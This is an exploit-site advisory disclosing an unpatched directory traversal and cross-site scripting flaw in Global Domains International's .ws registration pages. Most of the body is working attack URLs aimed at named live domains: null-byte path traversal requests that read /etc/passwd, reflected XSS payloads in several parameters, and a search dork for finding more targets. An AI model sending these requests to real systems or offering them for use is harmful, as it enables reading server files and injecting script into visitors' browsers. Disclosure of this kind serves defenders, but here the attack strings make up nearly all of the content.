Global Domains International Directory traversal Vulnerability 0-Day

2018.02.23
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================================================== | # Title : Global Domains International Directory traversal Vulnerability 0-Day | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://www.nic.ws | ==================================================================================================================================== # Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved http://www.nic.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 https://www.website.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 http://www.7.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 http://www.movie.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 http://welcome-back.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 Cross site scripting (verified) : /article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22 /kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11 /members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt> /orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt> http://freedom.ws/?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top